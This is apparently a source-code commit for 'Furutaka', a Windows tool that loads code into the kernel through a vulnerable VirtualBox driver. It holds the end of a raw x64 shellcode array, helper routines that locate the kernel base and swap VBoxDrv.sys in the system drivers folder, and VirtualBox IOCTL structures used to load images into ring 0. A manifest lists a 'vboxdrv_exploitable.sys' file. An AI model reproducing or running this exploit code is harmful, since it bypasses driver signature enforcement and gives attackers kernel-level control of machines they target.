0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44,
0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58,
0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24,
0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6,
0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41,
0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3
};

422
Source/Furutaka/sup.c Normal file
View File

@ -0,0 +1,422 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: SUP.C
*
* VERSION: 1.00
*
* DATE: 01 Feb 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* supGetSystemInfo
*
* Purpose:
*
* Wrapper for NtQuerySystemInformation.
*
*/
PVOID supGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS InfoClass
)
{
INT c = 0;
PVOID Buffer = NULL;
ULONG Size = 0x1000;
NTSTATUS status;
ULONG memIO;
PVOID hHeap = NtCurrentPeb()->ProcessHeap;
do {
Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
if (Buffer != NULL) {
status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
}
else {
return NULL;
}
if (status == STATUS_INFO_LENGTH_MISMATCH) {
RtlFreeHeap(hHeap, 0, Buffer);
Size *= 2;
c++;
if (c > 100) {
status = STATUS_SECRET_TOO_LONG;
break;
}
}
} while (status == STATUS_INFO_LENGTH_MISMATCH);
if (NT_SUCCESS(status)) {
return Buffer;
}
if (Buffer) {
RtlFreeHeap(hHeap, 0, Buffer);
}
return NULL;
}
/*
* supGetNtOsBase
*
* Purpose:
*
* Return ntoskrnl base address.
*
*/
ULONG_PTR supGetNtOsBase(
VOID
)
{
PRTL_PROCESS_MODULES miSpace;
ULONG_PTR NtOsBase = 0;
miSpace = supGetSystemInfo(SystemModuleInformation);
while (miSpace != NULL) {
NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
break;
}
return NtOsBase;
}
/*
* supQueryResourceData
*
* Purpose:
*
* Load resource by given id (win32 FindResource, SizeofResource, LockResource).
*
*/
PBYTE supQueryResourceData(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
)
{
NTSTATUS status;
ULONG_PTR IdPath[3];
IMAGE_RESOURCE_DATA_ENTRY *DataEntry;
PBYTE Data = NULL;
ULONG SizeOfData = 0;
if (DllHandle != NULL) {
IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
IdPath[1] = ResourceId; //id
IdPath[2] = 0; //lang
status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
if (NT_SUCCESS(status)) {
status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);
if (NT_SUCCESS(status)) {
if (DataSize) {
*DataSize = SizeOfData;
}
}
}
}
return Data;
}
/*
* supBackupVBoxDrv
*
* Purpose:
*
* Backup virtualbox driver file if it already installed.
*
*/
BOOL supBackupVBoxDrv(
_In_ BOOL bRestore
)
{
BOOL bResult = FALSE;
WCHAR szOldDriverName[MAX_PATH * 2];
WCHAR szNewDriverName[MAX_PATH * 2];
WCHAR szDriverDirName[MAX_PATH * 2];
if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) {
return FALSE;
}
_strcat(szDriverDirName, TEXT("\\drivers\\"));
if (bRestore) {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.backup"));
if (PathFileExists(szOldDriverName)) {
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.sys"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
}
else {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.sys"));
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.backup"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
return bResult;
}
/*
* supWriteBufferToFile
*
* Purpose:
*
* Create new file (or open existing) and write (append) buffer to it.
*
*/
SIZE_T supWriteBufferToFile(
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
)
{
NTSTATUS Status;
DWORD dwFlag;
HANDLE hFile = NULL;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING NtFileName;
IO_STATUS_BLOCK IoStatus;
LARGE_INTEGER Position;
ACCESS_MASK DesiredAccess;
PLARGE_INTEGER pPosition = NULL;
ULONG_PTR nBlocks, BlockIndex;
ULONG BlockSize, RemainingSize;
PBYTE ptr = (PBYTE)Buffer;
SIZE_T BytesWritten = 0;
if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE)
return 0;
DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;
dwFlag = FILE_OVERWRITE_IF;
if (Append == TRUE) {
DesiredAccess |= FILE_READ_ACCESS;
dwFlag = FILE_OPEN_IF;
}
InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);
__try {
Status = NtCreateFile(&hFile, DesiredAccess, &attr,
&IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,
FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);
if (!NT_SUCCESS(Status))
__leave;
pPosition = NULL;
if (Append == TRUE) {
Position.LowPart = FILE_WRITE_TO_END_OF_FILE;
Position.HighPart = -1;
pPosition = &Position;
}
if (Size < 0x80000000) {
BlockSize = (ULONG)Size;
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
BytesWritten += IoStatus.Information;
}
else {
BlockSize = 0x7FFFFFFF;
nBlocks = (Size / BlockSize);
for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
ptr += BlockSize;
BytesWritten += IoStatus.Information;
}
RemainingSize = Size % BlockSize;
if (RemainingSize != 0) {
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
BytesWritten += IoStatus.Information;
}
}
}
__finally {
if (hFile != NULL) {
if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus);
NtClose(hFile);
}
RtlFreeUnicodeString(&NtFileName);
}
return BytesWritten;
}
/*
* supDetectObjectCallback
*
* Purpose:
*
* Comparer callback routine used in objects enumeration.
*
*/
NTSTATUS NTAPI supDetectObjectCallback(
_In_ POBJECT_DIRECTORY_INFORMATION Entry,
_In_ PVOID CallbackParam
)
{
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
if (Entry == NULL) {
return STATUS_INVALID_PARAMETER_1;
}
if (CallbackParam == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
if (Param->Buffer == NULL || Param->BufferSize == 0) {
return STATUS_MEMORY_NOT_ALLOCATED;
}
if (Entry->Name.Buffer) {
if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) {
return STATUS_SUCCESS;
}
}
return STATUS_UNSUCCESSFUL;
}
/*
* supEnumSystemObjects
*
* Purpose:
*
* Lookup object by name in given directory.
*
*/
NTSTATUS NTAPI supEnumSystemObjects(
_In_opt_ LPWSTR pwszRootDirectory,
_In_opt_ HANDLE hRootDirectory,
_In_ PENUMOBJECTSCALLBACK CallbackProc,
_In_opt_ PVOID CallbackParam
)
{
BOOL cond = TRUE;
ULONG ctx, rlen;
HANDLE hDirectory = NULL;
NTSTATUS status;
NTSTATUS CallbackStatus;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING sname;
POBJECT_DIRECTORY_INFORMATION objinf;
if (CallbackProc == NULL) {
return STATUS_INVALID_PARAMETER_4;
}
status = STATUS_UNSUCCESSFUL;
__try {
// We can use root directory.
if (pwszRootDirectory != NULL) {
RtlSecureZeroMemory(&sname, sizeof(sname));
RtlInitUnicodeString(&sname, pwszRootDirectory);
InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
if (!NT_SUCCESS(status)) {
return status;
}
}
else {
if (hRootDirectory == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
hDirectory = hRootDirectory;
}
// Enumerate objects in directory.
ctx = 0;
do {
rlen = 0;
status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
if (status != STATUS_BUFFER_TOO_SMALL)
break;
objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
if (objinf == NULL)
break;
status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
if (!NT_SUCCESS(status)) {
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
break;
}
CallbackStatus = CallbackProc(objinf, CallbackParam);
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
if (NT_SUCCESS(CallbackStatus)) {
status = STATUS_SUCCESS;
break;
}
} while (cond);
if (hDirectory != NULL) {
NtClose(hDirectory);
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
status = STATUS_ACCESS_VIOLATION;
}
return status;
}
/*
* supIsObjectExists
*
* Purpose:
*
* Return TRUE if the given object exists, FALSE otherwise.
*
*/
BOOL supIsObjectExists(
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
)
{
OBJSCANPARAM Param;
if (ObjectName == NULL) {
return FALSE;
}
Param.Buffer = ObjectName;
Param.BufferSize = (ULONG)_strlen(ObjectName);
return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param));
}

59
Source/Furutaka/sup.h Normal file
View File

@ -0,0 +1,59 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: SUP.H
*
* VERSION: 1.00
*
* DATE: 01 Feb 2016
*
* Common header file for the program support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
typedef struct _OBJSCANPARAM {
PWSTR Buffer;
ULONG BufferSize;
} OBJSCANPARAM, *POBJSCANPARAM;
ULONG_PTR supGetNtOsBase(
VOID
);
PVOID supGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS InfoClass
);
PBYTE supQueryResourceData(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
);
BOOL supBackupVBoxDrv(
_In_ BOOL bRestore
);
SIZE_T supWriteBufferToFile(
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
);
BOOL supIsObjectExists(
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
);
#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)

226
Source/Furutaka/vbox.h Normal file
View File

@ -0,0 +1,226 @@
#include <stdint.h>
typedef void* RTR0PTR;
typedef struct _SUPREQHDR {
/** Cookie. */
uint32_t u32Cookie;
/** Session cookie. */
uint32_t u32SessionCookie;
/** The size of the input. */
uint32_t cbIn;
/** The size of the output. */
uint32_t cbOut;
/** Flags. See SUPREQHDR_FLAGS_* for details and values. */
uint32_t fFlags;
/** The VBox status code of the operation, out direction only. */
int32_t rc;
} SUPREQHDR;
/** SUP_IOCTL_COOKIE. */
typedef struct _SUPCOOKIE {
/** The header.
* u32Cookie must be set to SUPCOOKIE_INITIAL_COOKIE.
* u32SessionCookie should be set to some random value. */
SUPREQHDR Hdr;
union
{
struct
{
/** Magic word. */
char szMagic[16];
/** The requested interface version number. */
uint32_t u32ReqVersion;
/** The minimum interface version number. */
uint32_t u32MinVersion;
} In;
struct
{
/** Cookie. */
uint32_t u32Cookie;
/** Session cookie. */
uint32_t u32SessionCookie;
/** Interface version for this session. */
uint32_t u32SessionVersion;
/** The actual interface version in the driver. */
uint32_t u32DriverVersion;
/** Number of functions available for the SUP_IOCTL_QUERY_FUNCS request. */
uint32_t cFunctions;
/** Session handle. */
/*R0PTRTYPE(PSUPDRVSESSION)*/ PVOID pSession;
} Out;
} u;
} SUPCOOKIE, *PSUPCOOKIE;
typedef struct _SUPLDROPEN {
/** The header. */
SUPREQHDR Hdr;
union
{
struct
{
/** Size of the image we'll be loading. */
uint32_t cbImage;
/** Image name.
* This is the NAME of the image, not the file name. It is used
* to share code with other processes. (Max len is 32 chars!) */
char szName[32];
} In;
struct
{
/** The base address of the image. */
RTR0PTR pvImageBase;
/** Indicate whether or not the image requires loading. */
BOOLEAN fNeedsLoading;
} Out;
} u;
} SUPLDROPEN, *PSUPLDROPEN;
typedef enum _SUPLDRLOADEP {
SUPLDRLOADEP_NOTHING = 0,
SUPLDRLOADEP_VMMR0,
SUPLDRLOADEP_SERVICE,
SUPLDRLOADEP_32BIT_HACK = 0x7fffffff
} SUPLDRLOADEP;
typedef struct _SUPSETVMFORFAST {
/** The header. */
SUPREQHDR Hdr;
union
{
struct
{
/** The ring-0 VM handle (pointer). */
PVOID pVMR0;
} In;
} u;
} SUPSETVMFORFAST, *PSUPSETVMFORFAST;
typedef struct _SUPLDRLOAD
{
/** The header. */
SUPREQHDR Hdr;
union
{
struct
{
/** The address of module initialization function. Similar to _DLL_InitTerm(hmod, 0). */
PVOID pfnModuleInit;
/** The address of module termination function. Similar to _DLL_InitTerm(hmod, 1). */
PVOID pfnModuleTerm;
/** Special entry points. */
union
{
/** SUPLDRLOADEP_VMMR0. */
struct
{
/** The module handle (i.e. address). */
RTR0PTR pvVMMR0;
/** Address of VMMR0EntryInt function. */
RTR0PTR pvVMMR0EntryInt;
/** Address of VMMR0EntryFast function. */
RTR0PTR pvVMMR0EntryFast;
/** Address of VMMR0EntryEx function. */
RTR0PTR pvVMMR0EntryEx;
} VMMR0;
/** SUPLDRLOADEP_SERVICE. */
struct
{
/** The service request handler.
* (PFNR0SERVICEREQHANDLER isn't defined yet.) */
RTR0PTR pfnServiceReq;
/** Reserved, must be NIL. */
RTR0PTR apvReserved[3];
} Service;
} EP;
/** Address. */
RTR0PTR pvImageBase;
/** Entry point type. */
SUPLDRLOADEP eEPType;
/** The offset of the symbol table. */
uint32_t offSymbols;
/** The number of entries in the symbol table. */
uint32_t cSymbols;
/** The offset of the string table. */
uint32_t offStrTab;
/** Size of the string table. */
uint32_t cbStrTab;
/** Size of image (including string and symbol tables). */
uint32_t cbImage;
/** The image data. */
char achImage[1];
} In;
} u;
} SUPLDRLOAD, *PSUPLDRLOAD;
#define RT_SIZEOFMEMB(type, member) ( sizeof(((type *)(void *)0)->member) )
#define SUPCOOKIE_INITIAL_COOKIE 0x69726f74 /* 'tori' */
#define SUP_IOCTL_COOKIE_SIZE_IN sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.In)
#define SUP_IOCTL_COOKIE_SIZE_OUT sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.Out)
#define SUP_IOCTL_FLAG 128
#define SUP_CTL_CODE_SIZE(Function, Size) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define SUP_CTL_CODE_BIG(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_NEITHER, FILE_WRITE_ACCESS)
#define SUP_CTL_CODE_NO_SIZE(uIOCtl) (uIOCtl)
/** The magic value. */
#define SUPREQHDR_FLAGS_MAGIC UINT32_C(0x42000042)
/** The default value. Use this when no special stuff is requested. */
#define SUPREQHDR_FLAGS_DEFAULT SUPREQHDR_FLAGS_MAGIC
#define VERR_INTERNAL_ERROR (-225)
#define SUPCOOKIE_MAGIC "The Magic Word!"
#define SUPDRV_IOC_VERSION 0x001a0007
/** The request size. */
#define SUP_IOCTL_COOKIE_SIZE sizeof(SUPCOOKIE)
/** Negotiate cookie. */
#define SUP_IOCTL_COOKIE SUP_CTL_CODE_SIZE(1, SUP_IOCTL_COOKIE_SIZE)
/** There is extra input that needs copying on some platforms. */
#define SUPREQHDR_FLAGS_EXTRA_IN UINT32_C(0x00000100)
/** There is extra output that needs copying on some platforms. */
#define SUPREQHDR_FLAGS_EXTRA_OUT UINT32_C(0x00000200)
/** @name SUP_IOCTL_SET_VM_FOR_FAST
* Set the VM handle for doing fast call ioctl calls.
* @{
*/
#define SUP_IOCTL_SET_VM_FOR_FAST SUP_CTL_CODE_SIZE(19, SUP_IOCTL_SET_VM_FOR_FAST_SIZE)
#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE sizeof(SUPSETVMFORFAST)
#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN sizeof(SUPSETVMFORFAST)
#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT sizeof(SUPREQHDR)
#define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66)
#define SUP_IOCTL_LDR_OPEN SUP_CTL_CODE_SIZE(5, SUP_IOCTL_LDR_OPEN_SIZE)
#define SUP_IOCTL_LDR_OPEN_SIZE sizeof(SUPLDROPEN)
#define SUP_IOCTL_LDR_OPEN_SIZE_IN sizeof(SUPLDROPEN)
#define SUP_IOCTL_LDR_OPEN_SIZE_OUT (sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPLDROPEN, u.Out))
#define SUP_IOCTL_LDR_LOAD SUP_CTL_CODE_BIG(6)
#define SUP_IOCTL_LDR_LOAD_SIZE(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage])
#define SUP_IOCTL_LDR_LOAD_SIZE_IN(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage])
#define SUP_IOCTL_LDR_LOAD_SIZE_OUT sizeof(SUPREQHDR)
/** @name SUP_IOCTL_LDR_FREE
* Free an image.
* @{
*/
#define SUP_IOCTL_LDR_FREE SUP_CTL_CODE_SIZE(7, SUP_IOCTL_LDR_FREE_SIZE)
#define SUP_IOCTL_LDR_FREE_SIZE sizeof(SUPLDRFREE)
#define SUP_IOCTL_LDR_FREE_SIZE_IN sizeof(SUPLDRFREE)
#define SUP_IOCTL_LDR_FREE_SIZE_OUT sizeof(SUPREQHDR)
typedef struct _SUPLDRFREE {
/** The header. */
SUPREQHDR Hdr;
union
{
struct
{
/** Address. */
RTR0PTR pvImageBase;
} In;
} u;
} SUPLDRFREE, *PSUPLDRFREE;

47
TDL.sha256 Normal file
View File

@ -0,0 +1,47 @@
c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys
4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys
48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe
01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj
2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj
f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c
cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c
3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h
cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys
01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln
c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj
b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user
1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h
c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c
964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h
8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Furutaka\minirtl\rtltypes.h
e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13 *Source\Furutaka\minirtl\u64tohex.c
4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5 *Source\Furutaka\minirtl\u64tostr.c
f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107 *Source\Furutaka\minirtl\ultohex.c
9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Furutaka\minirtl\ultostr.c
83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52 *Source\Furutaka\minirtl\_strcat.c
ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutaka\minirtl\_strcmpi.c
969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8 *Source\Furutaka\minirtl\_strcpy.c
27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c
60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c
87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Furutaka\minirtl\_strncmpi.c
8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc
a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h
2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c
d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h